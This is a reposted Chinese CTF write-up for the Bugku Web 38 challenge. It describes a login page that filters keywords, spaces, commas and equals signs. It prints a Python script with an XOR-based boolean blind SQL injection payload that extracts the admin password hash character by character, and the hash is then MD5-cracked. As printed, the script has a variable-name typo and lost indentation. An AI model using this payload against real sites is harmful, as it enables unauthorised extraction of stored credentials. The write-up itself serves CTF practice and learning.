我是靠谱客的博主 任性项链,最近开发中收集的这篇文章主要介绍Bugku Web 38,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

Bugku Web 38

提 示: 基于布尔的SQL盲注

曾经我以为SQL注入很简单,没有多加练习,直到发现自己连ciscn初赛的easy_sql注入都不会做,我才追悔莫及

你看那个连SQL注入都不会的人好像条????啊

先瞅瞅

进入环境,是一个登陆页面,先试试万能密码(×),先试试adminbugku,adminbugkuctf,然后得到了flag,此题完

好好做

显示不合法的输入,显然被过滤了

然后再试试别的,发现被过滤的还有and,空格,逗号,等号,for
然后写脚本爆破password

import requests
import time
import string
url = 'http://114.67.246.176:19762/index.php'
source = string.digits + string.ascii_lowercase
a = ''
for i in range(1, 50):
for j in sourse:
payload = "admin'^((ascii(mid((select(password)from(admin))from(%s))))<>%s)^1#" % (i, ord(j))
data = {'username': payload, 'password': '0'}
res = requests.post(url, data=data)
time.sleep(0.01)# 不加sleep网站会因访问过快拒绝访问
if 'username does not exist!' in res.text:
a += j
print(a)
break

然后得到结果,用MD5解密可以看到密码是bugkuctf,好家伙

之后假装刚知道的账号密码,去登陆就得到了flag

最后

以上就是任性项链为你收集整理的Bugku Web 38的全部内容,希望文章能够帮你解决Bugku Web 38所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(32)

评论列表共有 0 条评论

立即
投稿
返回
顶部